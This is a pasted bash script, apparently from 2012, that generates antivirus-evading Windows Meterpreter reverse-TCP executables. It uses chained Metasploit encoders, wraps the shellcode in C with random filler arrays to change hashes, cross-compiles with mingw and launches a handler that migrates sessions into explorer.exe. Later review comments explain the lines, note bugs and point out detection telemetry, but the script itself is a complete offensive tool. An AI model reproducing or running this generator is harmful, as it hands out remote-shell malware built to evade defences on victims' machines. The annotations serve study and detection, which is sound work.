
fud payload generator for backtrack

a guest Feb 11th, 2012 968 Never
  1. #!/bin/bash
  2. # source : http://www.coresec.org/2011/11/09/fud-payload-generator-for-backtrack/
  3. # To install the following if they are not installed :
  4. # apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils
  5.  
  # Banner, removal of earlier output, and the four operator prompts.
  # NOTE(review): none of the answers (interface, port, seed, enumber) is
  # validated; further down they are expanded unquoted into ifconfig, head and
  # the encoder command lines, so empty or non-numeric input is passed through.
  6. echo "************************************************************"
  7. echo "    Automatic  shellcode generator - FOR METASPLOIT         "
  8. echo "                  By Astr0baby 2011                         "
  9. echo "  With some Randomic gravy and sauce to bypass Antivirus    "  
  10. echo "    For Automatic Teensy programming and deployment         "
  11. echo "************************************************************"
  12.  
  # Deletes ./ShellCode relative to the current directory without asking, so
  # the source and executable from an earlier run are lost.
  13. rm -rf ShellCode
  14.  
  15. echo "Here is a network device list available on yor machine"
  # Prints the first two space-separated fields of each /proc/net/dev line
  # after squeezing repeated spaces; the two header lines are dropped.
  16. cat /proc/net/dev | tr -s  ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
  17. echo -e "What network interface are we gonna use ?  \c"
  # read is used without -r throughout, so backslashes in an answer are
  # interpreted rather than stored literally.
  18. read interface
  19. echo -e "What Port Number are we gonna listen to? : \c"
  20. read port
  21. echo -e "Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : \c"
  22. read seed
  23. echo -e "And lastly how many times do we want to encode our payloads 1-20? : \c"
  24. read enumber
  # Derives the address later passed as LHOST from the interface the operator
  # named.
  25. # Get OS name
  26. OS=`uname`
  # NOTE(review): IO is set here but never read; the address is stored in IP,
  # which has no initial value of its own.
  27. IO="" # store IP
  28. case $OS in
  # Takes the text after the first ':' on ifconfig lines containing the literal
  # 'inet addr:' and drops 127.0.0.1. If ifconfig prints a different format, or
  # the interface has no IPv4 address, nothing matches and IP is empty; the
  # script does not check for that before using it.
  29.    Linux) IP=`ifconfig $interface  | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
  # On any other uname the literal string "Unknown" is used as the address.
  30.    *) IP="Unknown";;
  31. esac
  32. #echo "$IP"
  # Builds a windows/meterpreter/reverse_tcp stager that calls back to
  # $IP:$port and pipes it through four msfencode stages, each applied $enumber
  # times. The last stage has no -t option; the sed edits that follow expect
  # text containing 'buf = ' and '+', so it is presumably msfencode's default
  # text listing rather than raw bytes.
  # The tools are started as ./msfpayload and ./msfencode, so the script only
  # works from a directory that contains them; both utilities (and msfcli) were
  # retired from Metasploit Framework in 2015.
  # NOTE(review): no exit status is checked and pipefail is not set, so a
  # failing stage can leave test.c empty while the script carries on.
  # Encoding changes the stager's byte pattern, not its behaviour: the running
  # program still opens an outbound TCP connection to LHOST:LPORT, which is
  # what network and endpoint telemetry records.
  33. ./msfpayload windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x86/shikata_ga_nai -c $enumber -t raw | ./msfencode -e x86/jmp_call_additive -c $enumber -t raw | ./msfencode -e x86/call4_dword_xor -c $enumber -t raw |  ./msfencode -e x86/shikata_ga_nai -c $enumber  > test.c  
  34. mkdir ShellCode
  35. mv test.c ShellCode
  # NOTE(review): cd is unchecked; if mkdir or cd fails, every file operation
  # and rm -f below runs in the starting directory instead.
  36. cd ShellCode
  # Assembles final.c in this order: the stdio include, an array ufs[] of
  # quoted numbers, the encoded bytes as micro[], a main() that calls micro,
  # and a second array tap[] of quoted numbers.
  37. #Replacing plus signs at the end of line
  # NOTE(review): the expression replaces every '+' in the file, not only the
  # ones at the end of a line.
  38. sed -e 's/+/ /g' test.c > clean.c
  39. sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
  40. echo "#include <stdio.h>" >> temp
  41. echo 'unsigned char ufs[]=' >> temp
  # Pairs each integer 1..10000 with a $RANDOM key, sorts on the key (textual
  # sort, no -n), keeps the integer and takes the first $seed lines: a shuffled
  # list of distinct numbers. $seed is unvalidated operator input expanded
  # unquoted into head's option.
  42. for (( i=1; i<=10000;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp2
  # Wraps every line in double quotes so the C compiler concatenates them into
  # one string literal.
  43. sed -i 's/$/"/' temp2
  44. sed -i 's/^/"/' temp2  
  45. echo  ';' >> temp2  
  46. cat temp2 >> temp
  47. cat ready.c >> temp
  48. mv temp ready2.c
  49. echo ";" >> ready2.c
  # main() casts the data array micro to a function pointer and calls it. That
  # only works while the memory holding the array is executable; running code
  # from a data region is something DEP can stop and endpoint products can flag.
  50. echo "int main(void) { ((void (*)())micro)();}" >> ready2.c  
  51. mv ready2.c final.c
  52. echo 'unsigned char tap[]=' > temp3
  # Same shuffle as above over 1..999999; the loop runs all 999999 iterations
  # whatever $seed is.
  53. for (( i=1; i<=999999;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp4
  54. sed -i 's/$/"/' temp4
  55. sed -i 's/^/"/' temp4
  56. echo  ';' >> temp4
  57. cat temp4 >> temp3
  # ufs[] and tap[] are never referenced by main(); they are filler. Their
  # random content makes file size and hash differ from build to build while
  # the code that runs stays the same, so a hash taken from one sample will not
  # match another build.
  58. cat temp3 >> final.c  
  # Removes the intermediate files. final.c, the generated C source, is not in
  # the list and stays on disk next to the executable.
  59. #Cleanup
  60. rm -f clean.c
  61. rm -f test.c
  62. rm -f ready.c
  # NOTE(review): nothing in this script creates rand.c; this line has no
  # effect unless such a file already exists in the directory.
  63. rm -f rand.c
  64. rm -f temp2
  65. rm -f temp3
  66. rm -f temp4
  67.  
  # Cross-compiles final.c with a hard-coded mingw32 compiler path, renames the
  # result, prints its name and SHA-1, then strips debug symbols.
  # NOTE(review): all compiler output, errors included, goes to /dev/null and
  # the exit status is not checked; a failed build only shows up as the mv
  # below failing.
  68. /usr/bin/i586-mingw32msvc-gcc -Wall ./final.c -o ./final.exe > /dev/null 2>&1
  # $RANDOM is 0-32767, so the output is a numerically named .exe.
  69. mv final.exe $RANDOM.exe
  # NOTE(review): the name is recovered by taking the most recently changed
  # entry from ls rather than by keeping it in a variable; any other file
  # changed in the directory at that moment would be picked up instead.
  70. filex=`ls -ct1 | head -1`
  # NOTE(review): the hash is taken before strip runs (last command of this
  # block), so the printed SHA-1 describes the unstripped file and may not match
  # the executable left on disk. Anyone recording it as an indicator should
  # hash the file after strip.
  71. sumx=`sha1sum $filex`
  72. echo $filex "...generated in ShellCode subfolder"
  # sha1sum output already contains the file name, so the name appears twice.
  73. echo $filex "sha1checksum is .." $sumx  
  74. strip --strip-debug $filex
  75. cd ..
  # Starts a Metasploit multi/handler for the same payload on the LHOST/LPORT
  # used when the stager was generated; the call blocks in the foreground.
  76. echo "      starting the meterpreter listener..."
  77. sleep 2
  # AutoRunScript makes each new session run 'migrate2' with the argument
  # explorer.exe. migrate2 is not defined on this page; presumably it moves the
  # session into explorer.exe (confirm against the script itself). On the
  # target that would appear as a newly started, numerically named executable
  # opening and injecting into explorer.exe, a sequence process-access and
  # injection monitoring can alert on.
  78. ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port AutoRunScript=' migrate2  explorer.exe'  E